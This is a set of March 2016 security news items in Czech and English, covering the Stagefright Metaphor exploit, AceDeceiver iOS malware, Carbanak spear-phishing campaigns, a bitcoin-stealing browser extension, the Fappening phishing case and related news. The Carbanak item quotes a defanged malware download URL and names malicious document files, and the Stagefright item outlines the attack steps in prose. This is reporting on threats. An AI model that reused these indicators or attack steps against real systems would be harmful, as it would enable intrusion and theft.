17.3.2016 Hacking
Již dnes existují nadšenci, kteří podstupují bolestivé procedury kvůli tomu, aby pomocí technologií vylepšili svoje tělo a stali se tak mnohem dokonalejšími kyborgy. Celé hnutí, jedno z odvětví takzvaného biohackingu, je zatím v počátcích.

Lidská fantazie, kreativita a nadšení pro experimenty zdánlivě neznají hranic. Na druhou stranu by také kreativita člověka měla mít jistá omezení. Na internetu se například v současnosti formuje skupina lidí, kteří experimentují s technologií neuronální stimulace mozku v domácích podmínkách.

Americká společnost Foc.us tvrdí, že vyvinula speciální headset, po jehož nasazení budou počítačoví hráči dosahovat lepších reakčních časů. Mnozí si od této techniky slibují povzbuzení nálady nebo vylepšení schopnosti učit se. Jistý vysokoškolák na YouTube otevřeně mluví o tom, že stimulační elektrody přiložil na hlavu „nějak tam a tady“. Namísto zlepšení svých schopností ale nejméně na jednu hodinu upadl do hluboké deprese – což ho však neodradilo od dalších experimentů.

Rozšíření psychických a tělesných schopností člověka, či pokusy vytvořit pomocí technologií jakéhosi dokonalého kyborga, nesou označení grinding. Dal by se zařadit jako podkategorie takzvaného biohackingu. V druhém odvětví tohoto poměrně nového směru lidé experimentují především s dědičným kódem DNA.

Amatérští biologové v domácích podmínkách „hackují“ DNA a vyvíjejí třeba nové druhy zeleniny. Stvořili už například jogurt, který ve tmě zeleně fluoreskuje, protože do jeho bílkoviny byl přidaný gen medúzy. Další větev biohackingu pak tvoří zmíněný grinding, kdy se pomocí moderních technických vymožeností hackeři snaží upravovat samotného člověka – grindeři to nazývají jako „self-biohacking“, nebo snad ještě výstižnějším termínem „ sebe-kustomizace“. Pojďme se podívat na to, na jaké hranice – etické, technologické a další – jejich kreativní experimentování naráží.

Čipová kontrola nad pacienty

Biohacking kódu DNA vyvolává ze zcela pochopitelných důvodů odpor veřejnosti. Je nasnadě, že domácí amatérské experimentování s kódem života se může vymstít. Naopak technologicky zaměřený grinding už takové emoce nevzbuzuje, protože lidé, kteří se ze sebe s pomocí techniky snaží udělat vylepšené kyborgy, zpravidla mohou ublížit jen sami sobě.

Technická zařízení, která se lidem snaží usnadnit život, pochopitelně existují již dnes – v medicíně to jsou například různé druhy protéz, kardiostimulátory a podobně. Pro diabetiky existuje pomoc v podobě nové technologie, kterou vyvíjí americká univerzita v Akronu. Tamní vědci pracují na kontaktní čočce, která měří hladinu cukru v krvi ze slz.

Podle nich potom čočka mění barvu, takže diabetik může informaci o hodnotě cukru v těle zjistit pohledem do zrcadla. Případně může oko vyfotografovat, a speciální software potom podle barvy čočky vypočítá hladinu cukru, podle níž si potom pacient zvolí příslušnou dávku inzulinu.

V medicíně bychom našli mnoho dalších pokusů tohoto typu jakéhosi neinvazivního, „umírněného grindingu“. Kontaktní čočka pro diabetiky nevzbuzuje žádné negativní emoce, kromě pochybností o tom, zda informace o hladině cukru v krvi má být prostřednictvím barvy čočky dostupná také všem lidem v okolí. Již spornějším případem jsou například snahy o integraci čipů do tablet s lékem.


Kyberzločinci kradli bitcoiny pomocí rozšíření v prohlížeči

17.3.2016 Hacking
Kurz bitcoinů se drží posledních pár týdnů poměrně vysoko. To je jeden z hlavních důvodů, proč tato virtuální měna láká stále více lidí po celém světě. Vysoká popularita nezůstala lhostejná ani kyberzločincům, kteří se právě na majitele bitcoinů zaměřili. Šance na jejich dopadení je prakticky nulová.
Počítačoví piráti se zaměřili na uživatele internetové stránky BitcoinWisdom.com, kterou každý měsíc navštíví milióny uživatelů z různých koutů světa. Tento server totiž nabízí v poměrně přehledné formě informace o kurzu bitcoinu a analýzy možných vývojů kurzů. Pro uživatele je tedy jakousi nápovědou, jak nakupovat nebo prodávat.

Uživatelům zmiňovaného serveru nabídli kyberzločinci rozšíření pro populární internetový prohlížeč Chrome, které dovolovalo na stránkách BitcoinWisdom.com blokovat reklamu.

Přesně to rozšíření také v praxi dělalo, takže si uživatelé prvních pár dnů používání patrně ani nevšimli, že je něco v nepořádku. Kromě blokování reklamy totiž toto rozšíření přesměrovávalo platby v bitcoinech, uvedl server Softpedia.

Poslané peníze končily na účtech pirátů
Poslané peníze tak končily na účtech podvodníků. Vzhledem k tomu, že transakce bitcoinů není prakticky možné vystopovat, je velmi nepravděpodobné, že by se podařilo kyberzločince vystopovat.

Je každopádně jasné, že byznys to byl pro počítačové piráty opravdu velký. Pouhý jeden bitcoin má při aktuálním kurzu hodnotu zhruba 10 000 korun. Slušný balík peněz tak mohli vydělat i v případě, že by se jim podařilo získat pouhých pár bitcoinů.

Kolik uživatelů se podařilo prostřednictvím rozšíření kyberzločincům okrást, zatím není známo.

Virtuální měny představují velké riziko
Virtuální měna bitcoin vznikla v roce 2009, větší popularitě se ale těší v posledních letech. Vytvořena byla tak, aby se nedala ovlivňovat žádnou vládou ani centrální bankou.

Kybernetické mince "razí" síť počítačů se specializovaným softwarem, naprogramovaným tak, aby uvolňoval nové mince stabilním, ale stále klesajícím tempem. Počet mincí v oběhu má dosáhnout nakonec 21 miliónů, což má být kolem roku 2140.

Bitcoiny se těší velké popularitě především coby prostředek pro investici. Kurzy však často kolísají. Evropský bankovní úřad kvůli tomu dokonce již dříve varoval spotřebitele, že neregulované virtuální měny představují velké riziko. Jejich vklady totiž nejsou nijak chráněny.


DARPA Invites Geeks to Convert Everyday Objects into Deadly Weapons
17.3.2016  IT
Do you know that your daily household items can be turned into deadly weapons?
Yes, it's possible to convert some of your everyday household appliances into explosives, weapons or surveillance devices.
DARPA – the agency which does research in various fields for improving the US Military and US Department of Defense capabilities – had announced a new project dubbed "Improv" to transform simple household appliances into deadly weapons i.e. homemade weapons.
In previous years, various military grade weapons had been found malfunctioned by the ordinary household things that could cripple the military inventions.
By various incidents happening around the Military grounds, officials observed that "how easily-accessed hardware, software, processes, and methods could be used to create products or systems that could pose a future threat."
So, DARPA (Defense Advanced Research Projects Agency) proceeded with a program and is seeking proposals from engineers, skilled hardware hackers, biologists and information technologists, who can come up with some innovative ideas to build a deadly system or devices by unleashing the power of everyday things.
Improv - Initiative to Build Weaponised Capabilities into Home Appliances
Improv program will carry out research on the systems and devices of the readily available technology that could threaten the national security by challenging the current military equipment.
"Improv will explore ways to combine or convert commercially available products such as off-the-shelf electronics, components created through rapid prototyping, and open-source code to cost-effectively create sophisticated military technologies and capabilities," said John Main, Improv's Program Manager.
The program's prime aim is to build capabilities of a weaponized device in normal household things.
Open Challenge!
Improv would undergo 3 Phases to finalize the proposed system:
Phase 1: Submit plans for off-the-shelf prototype and if selected, candidates would be rewarded with $40,000.
Phase 2: The second round of the program requires selected candidates to bring proposed prototype model into real world system for which DARPA will fund $70,000.
Phase 3: The final stage is for a live demonstration with up to $20,000 for testing.
The Candidates have to complete this task with a strict deadline of 90 days as per Rules of DARPA.
Improv understands the fact that no one can be a Jack of all trades. Hence, there are no exclusions for anyone to give his or her try, which could really save the world from the potential dangers, unlike "Hack the Pentagon" program which was opened only for US Nationals.
Nowadays many mushrooming methods are evolved to manipulate the legit systems, which is a nightmare for millions and a daydream for criminals.
So, Improv would be seen as a new dimension to the US Military Defense to tackle the risky attacks.


ProtonMail is open. Do you want an encrypted email account? Sign in!
17.3.2016 Security

ProtonMail, the world’s largest privacy-focused and encrypted email provider, announced today that the service is leaving beta.

ProtonMail, the world’s largest privacy-focused and encrypted email provider, announced today that the service is leaving beta and will be allowing open registrations for the first time in nearly two years. For the past couple of years, ProtonMail has been invite-only, more that one million users had the opportunity to test the beta. The service also presented its free mobile apps available for both Apple iOS and Android devices.

ProtonMail was first launched in beta in May 2014 by a group of scientists who met at CERN and MIT, but its popularity reached the peak after the disclosure of the Snowden‘s revelation on the mass-surveillance operated by the FiveEyes alliance.

The company then received an impressive amount of demands for new accounts that forced it to create a waiting list. According to the company, the requests exceeded 10,000 per day.

ProtonMail is an essential instrument to protect our privacy, businesses, journalists, activists, security experts, private individuals, me … and Mr Robot, already use it. The email service implements the end-to-end encryption allowing users to communicate securely on the Internet making impossible for law enforcement and intelligence agencies to eavesdrop the traffic.

In the End-to-end Encryption model data is encrypted on the sender’s system before passing it to the servers of the service provider, which turn the encrypted data to the intended recipient, who is the only entity who can decrypt it.

Of course, this isn’t a good moment for companies that offers such kind of services, ProtonMail has been frequently thrust into the public debate over encryption and terrorism, and in several cases it had problems with governments to protect user privacy.

“Strong encryption and privacy are a social and economic necessity, not only does this technology protect activists and dissidents, it is also key to securing the world’s digital infrastructure,” says ProtonMail Co-Founder Dr. Andy Yen, “this is why all things considered, strong encryption is absolutely necessary for the greater good.”

ProtonMail has decided to open the service for public registration, this means that everyone can obtain an account for free immediately.

“The best way to ensure that encryption and privacy rights are not encroached upon is to get the tools into the hands of the public as soon as possible and widely distributing them,” says Yen, “This way, we put the choice in the hands of the consumer, and not government regulators.”

“The past decade has been marked by a massive erosion of privacy and we’re working to reverse this trend,” says Yen. “Encrypted communications is the future and ProtonMail is committed to making online privacy a reality again for all Internet users.”

Get your free account!


New Exploit to 'Hack Android Phones Remotely' threatens Millions of Devices
17.3.2016 Android
Millions of Android devices are vulnerable to hackers and intelligence agencies once again – Thanks to a newly disclosed Android Stagefright Exploit.
Yes, Android Stagefright vulnerability is Back…
…and this time, the Stagefright exploit allows an attacker to hack Android smartphones in 10 seconds just by tricking users into visiting a hacker's web page that contains a malicious multimedia file.
A group of security researchers from Israel-based research firm NorthBit claimed it had successfully exploited the Stagefright bug that was emerged in Android last year and described as the "worst ever discovered".
The new Stagefright exploit, dubbed Metaphor, is detailed in a research paper [PDF] that guides bad guy, good guy as well as government spying agencies to build the Stagefright exploit for themselves.
Just yesterday, we reported about critical vulnerabilities in Qualcomm Snapdragon chip that could be exploited by any malicious application to gain root access on a vulnerable Android device, leaving more than a Billion Android devices at risk.
Video Demonstration — Exploit to Hack Android Phone in 10 Seconds
The researchers have also provided a proof-of-concept video demonstration that shows how they successfully hacked an Android Nexus 5 device using their Metaphor exploit in just 10 seconds. They also successfully tested Metaphor on a Samsung Galaxy S5, LG G3 and HTC One smartphones.

According to the researchers, Millions of unpatched Android devices are vulnerable to their exploit that successfully bypasses security defenses offered by Android operating system.
What is StageFright Bug and Why You have to Worry about it?
Stagefright is a multimedia playback library, written in C++, built inside the Android operating system to process, record and play multimedia files such as videos.
However, what Zimperium researchers discovered last year was that this core Android component can be remotely exploited to hijack 95 percent of Android devices with just a simple booby-trapped message or web page.
Another critical vulnerability discovered last October in Stagefright exploited flaws in MP3 and MP4 files, which when opened were capable of remotely executing malicious code on Android devices, and was dubbed Stagefright 2.0.
However, to tackle this serious issue, Google released a security update that patches the critical bug as well as promised regular security updates for Android smartphones following the seriousness of the Stagefright bugs.
Here's How the New Stagefright Exploit Works
Researchers described the following process to successfully hijack any vulnerable Android smartphone or tablet:
Step 1: Tricking a victim into visiting a malicious web page containing a video file that crashes the Android's mediaserver software to reset its internal state.
Step 2: Once the mediaserver gets a restart, JavaScript on the web page sends information about the victim's device over the Internet to the attacker's server.
Step 3: The attacker's server then sends a custom generated video file to the affected device, exploiting the Stagefright bug to reveal more info about the device's internal state.
Step 4: This information is also sent back to the attacker's server to craft another video file that embeds a payload of malware in it, which when processed by Stagefright starts executing on the victim's smartphone with all the privileges it needs to spy on its owner.
The researchers also claim that their exploit specifically attacks the CVE-2015-3864 vulnerability in a way that bypasses Address Space Layout Randomisation (ASLR), a memory protection process.
"It was claimed [the Stagefright bug] was impractical to exploit in­ the wild, mainly due to the implementation of exploit mitigations in [latest] Android versions, specifically ASLR," the research paper reads.
The team's exploit works on Android versions 2.2 ­to 4.0 and 5.0 to 5.1 while bypassing ASLR on Android versions 5.0 to 5.1, as version 2.2 to version 4.0 do not implement ASLR. Other Android versions are not affected by the new Stagefright exploit.
You can go through the full research paper [PDF] that provides enough details to create a fully working and successful exploit.


Warning — Hackers can Silently Install Malware to Non-Jailbroken iOS Devices
17.3.2016 iOS
Hard time for mobile phone users!
Just recently, two severe vulnerabilities in Qualcomm Snapdragon chip and Stagefright were spotted on the Android platform, affecting more than a Billion and Millions of devices respectively.
And now:
Hackers have discovered a new way to install malicious apps onto your iPhone without your interaction.
Researchers at Palo Alto Networks have uncovered a new strain of malware that can infect Non-Jailbroken (factory-configured) iPhones and iPads without the owner's knowledge or interaction, leaving hundreds of millions of Apple iOS devices at risk.
Dubbed AceDeceiver, the iPhone malware installs itself on iOS devices without enterprise certificates and exploits designing flaws in Apple's digital rights management (DRM) protection mechanism called FairPlay.
What's more concerning about this malware:
Unlike most iOS malware, AceDeceiver works on factory-configured (non-jailbroken) iOS devices as well.
FairPlay is an Apple's software program that prevents people from stealing purchased apps from its official App Store.
apple-iphone-hack
However, with the help of AceDeceiver's "FairPlay Man-in-the-Middle (MITM) technique," hackers can install malicious apps on your iPhone even without your knowledge, simultaneously bypassing Apple's other security defenses.
According to researchers, the FairPlay Man-In-The-Middle (MITM) technique has been in use since 2013, as a way to distribute pirated iOS apps.
"In the FairPlay MITM attack, attackers purchase an app from App Store then intercept and save the authorization code," Claud Xiao from Palo Alto Networks explains in a blog post. "They then developed PC software that simulates the iTunes client behaviors, and tricks iOS devices to believe the app was purchased by the victim."
However, this is the first time the FairPlay technique has been used to spread malware on iOS devices, as the creator of the pirated software can install potentially malicious apps without your knowledge.
Currently, the malicious behaviors related to AceDeceiver has been spotted in China, but researchers warn that the malware could be easily configured to target iPhone users of other geographic regions as well.
For more details, you can head on to Palo Alto Networks' blog post about the AceDeceiver threat.


American Express issued a notice of data breach
17.3.2016 Security

American Express is informing cardholders that their payment card data may have been exposed after a third-party service provider suffered a security breach.
Another illustrious victim of a data breach is in the headlines, this time, American Express is warning Cardholders of a possible incident occurred to a third party service provider. The name of the affected service provider has not been made public.

According to the American Express, data associated with current or previously issued American Express cards might have been stolen by hackers. The information obtained by unauthorized parties includes account numbers, names, and expiration dates.

“We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system. Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure.” states a data breach notice published by the Office of the Attorney General of the State of California DoJ.

American Express highlighted that its financial systems were not affected by the incident, in order to prevent abuse the company is monitoring of fraudulent activities that might affect cardholders.

American Express Co. credit cards are arranged for a photograph in New York, U.S., on Monday, April 15, 2013. American Express Co., the biggest U.S. credit-card issuer by purchases, named Edward P. Gilligan to become its president, effective immediately. Photographer: Scott Eells/Bloomberg via Getty Images

American Express confirmed that cardholders are not liable for any fraudulent charges, at the same time is inviting them to monitor their account for fraud.

American Express suggests cardholders enabling instant notifications of a potentially fraudulent activity, the company offers it by enabling notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts

“WHAT YOU CAN DO. We ask that you carefully review your account for fraudulent activity. Below are some steps you can take to protect your account. Login to your account at americanexpress.com/MYCA to review your account statements carefully and remain vigilant in doing so, especially over the next 12 to 24 months. If your card is active, sign up to receive instant notifications of potential suspicious activity by enabling Notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts. Please make sure your mobile phone number and email address are also on file for us to contact you if needed. OTHER IMPORTANT INFORMATION. Included with this letter are some additional helpful tips and steps you can take to protect yourself against the risks of fraud and identity theft.” states the notice.

Incidents like this remark the importance of cyber security for the entire chain of custody with sensitive data, an incident at some point in the chain could compromise the entire process.

In this specific case, American Express relies on a third party service that has been breached causing the exposure of the confidential information.

If you are an AMEX cardholder remain vigilant.


How to install the AceDeceiver malware onto any iOS Device
17.3.2016 iOS

AceDeceiver is the first iOS malware that abuses certain design flaws in Apple’s FairPlay DRM to install malicious apps on iOS devices even non-jailbroken.
Hackers are exploiting a flaw affecting the Apple digital rights management technology (DRM) to install malicious apps on every iOS device, even non-jailbroken ones.

Last month, security experts at Palo Alto Networks firm spotted three malicious applications deployed on the official App Store that were developed to steal Apple IDs and passwords from Chinese users.

The interesting part of the discovery made by Palo Alto is related to the ability of the three apps to be silently installed through software running on Windows machines.

The only ways to install a mobile app on an iOS device that hasn’t been jailbroken, is to download it from the official App Store or install it through the iTunes software from users’ PCs. In this second scenario, the device verifies the legitimate origin of the app with the Apple’s FairPlay DRM technology.

In 2014, a team of researchers from Georgia Institute of Technology presented at the USENIX conference, a method through which an iOS device could be tricked to install any app, previously acquired by a different Apple ID, through the iTunes.

At this point the attack scenario is clear, hackers can remotely install apps on iOS device connected to an already compromised PC.

Without this premise, now researchers at Palo Alto Networks confirmed that hackers in the wild are still using this trick to serve a malicious app named AceDeceiver on non-jailbroken devices.

“We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”. states a blog post published by Palo Alto Networks.

“What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector.”

The threat actors first uploaded their apps to the App Store, managing to pass Apple’s review process by submitting them as wallpapers. Once the apps are deployed on the official store they purchased the apps through the iTunes in order to capture the DRM FairPlay authorization code.

The crooks developed a client software that simulates the iTunes and distributed it in China masquerading it as a helper program for iOS devices that can perform system reinstallation, jailbreaking, system backup, device management, and system cleaning.

“To carry out the attack, the author created a Windows client called ”爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning.” continues the post.

When users connected their iOS devices to a computer running this software, it silently installed AceDeceiver by using the authorization code captured when the app was first deployed on the official store.

“By deploying authorized computer in the C2 server, and using a client software as agent in the middle, the attacker can distribute that purchased iOS app to unlimited iOS devices.” reads the post.

AceDeceiver attack

What happen if Apple removes the AceDeceiver apps from the official store?

Nothing, the technique presented by the researchers at USENIX in 2014 works even if the app has been removed from the App Store because attackers already have the authorization code they need to complete the installation.

“Even if an app has been removed from the App Store, attackers can still distribute their own copies to iOS users.” the team of experts explained at the USENIX conference.

The technique used to serve the AceDeceiver malware is very dangerous, in the future other criminal gangs could start using it.

“Our analysis of AceDeceiver leads us to believe FairPlay MITM attack will become another popular attack vector for non-jailbroken iOS devices – and thus a threat to Apple device users worldwide. Palo Alto Networks has released IPS signatures (38914, 38915) and has updated URL filtering and Threat Prevention to protect customers from the AceDeceiver Trojan as well as the FairPlay MITM attack technique.” states the Palo Alto.

Apple users beware, no one is immune!


Man behind The Fappening case charged with hacking celebrity accounts
17.3.2016 Hacking

Pennsylvania man behind the Fappening case Charged with hacking Apple and Google e-Mail accounts belonging to more than 100 people.
The culprit of the popular Fappening case may have a name, the US Department of Justice (DOJ) announced on Tuesday that it charged Ryan Collins, 36, of Pennsylvania for hacking Apple and Google E-Mail accounts belonging to more than 100 people, mostly celebrities.

In September 2014, the FBI started an investigation after iCloud accounts of celebrities were hacked by unknowns that have stolen their pictures.

Immediately Apple denied that its iCloud platform was breached, instead, it explained that hackers obtained the images by hacking victims. A few days later, the consumer tech giant also announced that it would

A few days later, Apple announced the implementation of new features to improve the security of the iCloud service.

The list of victims is long and includes Jennifer Lawrence and Kim Kardashian, the hacker has stolen the private images of the celebrities and leaked their nude photos onto 4chan.

“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.
Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.

The man carried out spear phishing emails to the victims from November 2012 until the beginning of September 2014. In this way the man obtained the login credentials from its victims, then he illegally accessed their e-mail accounts to access sensitive and personal information.

The man behind the Fappening case focused his efforts to access nude pictures and videos from the victims, the DoJ announcement also revealed that in some circumstance he used a software to download the entire contents of the victims’ Apple iCloud backups.

“After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos, according to his plea agreement. In some instances, Collins would use a software program to download the entire contents of the victims’ Apple iCloud backups.” continues the press release.

Jennifer Lawrence The Fappening

The case will be transferred from Los Angeles to Harrisburg in the Middle District of Pennsylvania, where Collins lives.

Collins will face a statutory maximum sentence of five years in federal prison, but the man reached an agreement for a recommendation of a prison term of 18 months.

“By illegally accessing intimate details of his victims’ personal lives, Mr. Collins violated their privacy and left many to contend with lasting emotional distress, embarrassment and feelings of insecurity. We continue to see both celebrities and victims from all walks of life suffer the consequences of this crime and strongly encourage users of Internet-connected devices to strengthen passwords and to be skeptical when replying to emails asking for personal information,” David Bowdich, the Assistant Director in Charge of the FBI’s Los Angeles Field Office, said.

Other hackers have been already charged for hacking celebrities’ email accounts, in December 2015, Alonzo Knowles, aka “Jeff Moxey,” has been charged after allegedly hacking into the email accounts belonging to 130 celebrities stealing personal information, movie scripts and sex tapes.


Carbanak Group targets entities in Middle East and US with new TTPs
17.3.2016 Virus

Proofpoint has collected evidence of new Carbanak group campaigns.The hackers are targeting banks in the Middle East, the United States and other countries.
Security researchers at Proofpoint firm sustain to have collected evidence of new Carbanak group campaigns. This time the hackers are targeting banks in the Middle East, the United States and other countries.

Last year, Kaspersky investigated a number of cyber attacks on 29 Russian organizations, the researchers believe that these attacks have been coordinated by Carbanak and two other criminal gangs dubbed “Metel” and “GCMAN,” that adopted similar hacking techniques.

In September 2015, security experts at CSIS discovered that the Carbanak malware was still being used in spear phishing attacks against major organizations in UE and Europe.

“Just recently, CSIS carried out a forensic analysis involving a Microsoft Windows client that was compromised in an attempt to conduct fraudulent online banking transactions. As part of the forensic task, we managed to isolate a signed binary, which we later identified as a new Carbanak sample. ” wrote the CSIS in a blog post published by the CSIS.

“We speculate that the main purpose of this company is to receive money from fraudulent transactions. As stated in the Kaspersky report, Carbanak-related transfers are rather huge. Possibly, they have registered a company and opened bank accounts in order to receive their stolen money while having full control of the transferring process,”

The new Carbanak trojan was relying on predefined IP addresses instead of domains and in order to improve the evasion capability its code was signed with a digital certificate issued by Comodo to a Russia-based wholesale company.

Kaspersky confirmed that the Carbanak gang (also called Carbanak 2.0 by Kaspersky) was behind the attacks spotted by CSIS and revealed that the group is now targeting also the budgeting and accounting departments of various types of organizations, a including financial institution, and a telecoms company.

The group that targeted a Russian bank used a strain of malware known as Metel (aka Corkow) to compromise banks’ networks via spear-phishing emails.

Carbanak Group

This week, researchers at Proofpoint revealed to have spotted new campaigns targeting Middle Eastern countries, including United Arab Emirates, Kuwait, Lebanon and Yemen. The new campaign it targeting high-level executives and , directors, and operations managers at banks and enterprise software firms

The Carbanak Group seems to be targeting high-level executives, directors, senior managers, and regional and operations managers at banks, financial organizations, companies selling enterprise software, and professional services companies.

The hackers launched spear phishing attacks against victims, the email messages contain a URL that points to a malicious document designed to trigger an old Office vulnerability (CVE-2015-2545) to serve a malware downloader used to drop the Carbanak payload, aka Spy.Sekur.

In other cases, the attackers of the Carbanak Group have sent malicious emails containing links to the Java-based remote access Trojan jRAT.

” Recently, we detected Carbanak campaigns attempting to:

Target high level executives in financial companies or in financial/decision-making roles in the Middle East, U.S. and Europe
Spear-phishing emails delivering URLs, macro documents, exploit documents
Use of Spy.Sekur (Carbanak malware) and commodity remote access Trojans (RATs) such as jRAT, Netwire, Cybergate and others used in support of operations.” states the report published by Proofpoint.
Experts also analyzed another campaign targeting employees of US- and Europe-based companies in the financial industry, mass media, and other seemingly unrelated targets in fire, safety, air conditioning and heating. .

“Unlike the March 1st campaign, which contained links to exploit documents, this campaign employed documents attached to email messages. The two observed documents “remitter request_2016-03-05-122839.doc” and “Reverse debit posted in Error 040316.doc” use macros to download the final Spy.Sekur payload from hxxp://154.16.138[.]74/sexit.exe”

In this second campaign, hackers leveraged on emails containing Word documents which embedded malicious macros.

“Unlike the March 1st campaign, which contained links to exploit documents, this campaign employed documents attached to email messages. The two observed documents “remitter request_2016-03-05-122839.doc” and “Reverse debit posted in Error 040316.doc” use macros to download the final Spy.Sekur payload from hxxp://154.16.138[.]74/sexit.exe” states the report.

Carbanak Group new campaigns

The analysis of the information gathered during the investigation allowed the experts to discover most attacks targeted organizations in the United States (17.7 percent), followed by Oman, Australia, UAE, Kuwait, Pakistan, the Netherlands and Germany.

The researchers have uncovered links between Carbanak activity and other threats such as Cybergate, DarkComet and the MorphineRAT.

This last wave of attacks is very interesting because the group used new exploits, macro documents, and RATs to compromise non-Russian targets. The group is also expanding the scope of the attacks targeting companies and organizations in a various industries.


'The Fappening' Hacker Reveals How He Stole Nude Pics of Over 100 Celebrities
16.3.2016 Hacking
Almost one and a half years ago after the massive leakage of celebrities' nude photographs — famous as "The Fappening" or "Celebgate" scandal — a man had been charged with the Computer Fraud and Abuse Act, facing up to 5 years in prison as a result.
The US Department of Justice (DOJ) announced on Tuesday that it charged Ryan Collins, 36, of Pennsylvania for illegally accessing the Gmail and iCloud accounts of various celebrities, including Jennifer Lawrence and Kim Kardashian, and leaked their nude photos onto 4chan.
Social Engineering Helped Hacker Stole Celebs' Nude Pics
Collins was trapped by the Federal Bureau of Investigation (FBI) and in the process of the trial, the hacker revealed that…
The Fappening did not involve Apple's iCloud services being compromised through password cracking or brute-forcing, but rather it was the result of simple Social Engineering, in the form of Phishing Attacks.
Yes, The Fappening scandal was the result of Social Engineering tricks, while we believed that Apple's iCloud services had targeted under brute-force password hacking attacks.
At the time when the celebrities' nude images were circulating online, Apple denied that its iCloud service was hacked and claimed that the hacks were more likely to be a phishing scam. So this was actually the case.
Collins was engaged in Phishing schemes between November 2012 and September 2014, when he hijacked more than 100 celebs' accounts using fake emails disguised as official notifications from Google and Apple, asking victims for their usernames and passwords.
Hacker Used iBrute to Download iCloud Backups
Once done, Collins then used this information to access 50 iCloud accounts and 72 Gmail accounts, most of which belonged to female celebs, and in most cases used specialized 'brute force' software program iBrute to illegally download the contents of their iCloud backups and look for more data, including nude photos of celebrities.
Collins admitted only to hacking celebrities accounts, but not to uploading their naked photos online.
However this does not mean Collins did not leak those photographs, but the hacker negotiated a lighter guilty plea, allowing United States authorities to close the investigation faster.
Collins has not been sentenced yet but faces a maximum sentence of 5 years in prison for his crime, along with fines of up to $250,000. However, according to a plea agreement, the prosecution will recommend the judge an 18-month prison sentence.


Russia Rejects Google's Appeal and Orders to Stop Pre-Installing its own Android Apps
16.3.2016 Android
The Giant search engine Google has lost an anti-monopoly appeal in Russia against ruling related to its Android mobile OS
The Moscow Arbitration Court on Monday ruled that Google had violated its dominant position with the help of its free open source mobile platform "Android" by forcing its own apps and services like Youtube, Google Map, and others, on users — reducing competition.
The complaint was brought against Google last February by competing search engine Yandex — Russian Counterpart of Google — which had argued that Google broke competition rules by requiring handset manufacturers to pre-install its apps on Android phones and tablets.
Yandex-1, Google-0
According to the survey conducted by Liveinternet data in September 2013, Yandex accounted 57.4% of the Russian search market, while Google shared 34.9%. This stats reflected in the share market, as their shares were 62.2 and 26 percent respectively.
These statistical analyzes really worried Google about its operations in the Russian Cyberspace and soon it rolled out its Plan B to gain widespread popularity in the Russian Markets by shipping Android smartphones with Google Play Store as bloatware.
This, however, gained a pony monopoly among the Russian Markets. But soon, Yandex noticed that millions of smartphones in Russia shipped with the Android platform that uses Google as the default search engine.
As Yandex ranked as the 4th largest search engine worldwide, the popularity of Android in Russia had already reflected the changes in the Russian Stock Market, forcing Yandex to proceed with a lawsuit against Google in February 2015.
No Pre-installed Google Apps for Russians
The original ruling was then handed down by the country's privacy watchdog, the Federal Antimonopoly Service (FAS), last September over the pre-installed Google apps on Android and blocking other service providers.
Google appealed the ruling and filed an antitrust to adhere their business in the Russian Markets last year.
However, yesterday (Tuesday) the Moscow Arbitration Court rejected the company's appeal — upholding FAS' judgment that Google's practices broke Russian law by leading to the 'prohibition of pre-installation of apps of other producers.'
To regain its dominance over foreign search engines, FAS had already passed the case in favor of Yandex, the native search engine.
FAS adjourned that the default Android would not be coming with any pre-installed Google apps on Android smartphones and tablets in Russia.
Google will now be required to amend its contract with OEMs in Russia to comply with the ruling. The company now faces having to instruct its contracts with manufacturers and paying a penalty based on its local earnings.
Is Yandex - An Unsung Hero?
There is already a buzz in the cyber chat rooms that Yandex was a cloned product of Google, which is evident from many social discussion sites.
Yandex had already developed a unique method to search the whole Bible and Russian Literatures at its infancy stage, which was adopted by Google later.
These are some of the hidden facts about Yandex:
Yandex launched as a search engine in 1997, a year earlier than Google.
Yandex also launched maps in 2004, Google a year later in 2005.
Yandex was the first to launch news search in 2000, Google in 2002.
Blog search came out of Russia in 2004, but out of California only in 2006.
Yandex had already launched an RSS aggregator in 2005, Google followed in 2006.
Even Though Google had implemented many new ideas as time progressed with the help of its think tanks, yet Yandex was behind the implementations of classic times.
Let's look what would be the next roll out from Yandex after the Thumbs Up Rule from FAS.


More than a Billion Snapdragon-based Android Phones Vulnerable to Hacking
16.3.2016 Android
More than a Billion of Android devices are at risk of a severe vulnerability in Qualcomm Snapdragon chip that could be exploited by any malicious application to gain root access on the device.
Security experts at Trend Micro are warning Android users of some severe programming blunders in Qualcomm's kernel-level Snapdragon code that if exploited, can be used by attackers for gaining root access and taking full control of your device.
Gaining root access on a device is a matter of concern, as it grants attackers access to admin level capabilities, allowing them to turn your device against you to snap your pictures, and snoop on your personal data including accounts’ passwords, emails, messages and photos.
The company’s own website notes that Qualcomm Snapdragon SoCs (systems on a chip) power more than a Billion smart devices, including many Internet of Things (IoTs) as of today. Thus, the issue puts many people at risk of being attacked.
Although Google has pushed out updates after Trend Micro privately reported the issues that now prevents attackers from gaining root access with a specially crafted app, users will not be getting updates anytime soon.
The security update rolls out to your device through a long chain:
Qualcomm → Google → Your device's manufacturer → Your network carrier → Your handheld over the air
"Given that many of these devices are either no longer being patched or never received any patches in the first place," said Trend engineer Wish Wu, "they would essentially be left in an insecure state without any patch forthcoming."
Unfortunately, what’s more concerning is the fact that the same vulnerable chips are used in a large number of IoT devices, which are no longer in line for security updates. This makes it possible for hackers to gain root access to these connected devices, which is more worrying.
